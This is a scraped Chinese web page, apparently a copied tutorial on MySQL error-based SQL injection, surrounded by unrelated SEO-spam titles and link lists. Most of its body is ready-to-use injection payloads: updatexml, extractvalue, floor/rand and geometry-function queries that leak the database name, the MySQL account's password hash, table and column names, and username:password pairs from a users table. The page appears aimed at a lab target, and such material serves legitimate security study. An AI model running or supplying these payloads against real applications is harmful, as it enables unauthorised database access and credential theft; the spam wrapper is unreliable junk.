当前位置: 首页 > news >正文

网站首页的布局设计北京seo优化服务

网站首页的布局设计,北京seo优化服务,wordpress自带轮播,windows做网站服务器吗报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义 报错注入:利用sql语句的不规范,获取相关sql提示信息 代码展示 常用的报错语句 select first_name, last_name FROM…

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() -- 

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) -- 

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 

在这里插入图片描述

http://www.fp688.cn/news/145500.html

相关文章:

  • 中科商务网做网站垃圾推一手新闻发稿平台
  • 深圳北站设计者品牌推广策划方案怎么写
  • 湘乡新闻头条百度seo怎么查排名
  • c#做asp.net网站最新域名查询
  • 西部排名nba最新排名seo服务深圳
  • 制作视频的网站软件seo国外英文论坛
  • 做网站的说3年3年包括什么软件接单平台app
  • 三明住房和城乡建设部网站青岛网络seo公司
  • 成品网站w灬源码1688网页版免费制作小程序平台
  • ps插件国外网站网络营销就业方向和前景
  • 能免费做微信群推广的网站电商网页制作教程
  • 网站开发设计各部门职责杭州全网推广
  • 宁波网站建设多少钱一个哪里有整站优化
  • 达州做网站推广方法
  • 昆山网站建设兼职打开百度
  • 商务网页设计与制作相关技术介绍金华关键词优化平台
  • 江桥做网站付费推广方式有哪些
  • 网站设计的流程是怎样的seo工作流程
  • 做网站要求百度搜索优化怎么做
  • 教育网站 怎么做吸引人专业营销推广团队
  • 怎样做微信小程序seozou是什么意思
  • 淘宝客怎么做直播网站吗电商运营推广
  • asp.net做网站源代码网上推广app怎么做
  • 外卖网站设计软文大全
  • 最新疫情最新消息2023年7月份win10优化工具下载
  • 有什么网站可以做代理的优化公司流程制度
  • 株洲seo网站推广制作网站的公司有哪些
  • wordpress xmlrpc接口百度小程序排名优化
  • 景德镇网站建设哪家口碑好酒店营销策划与运营
  • 网站建设公司没有业务seo交流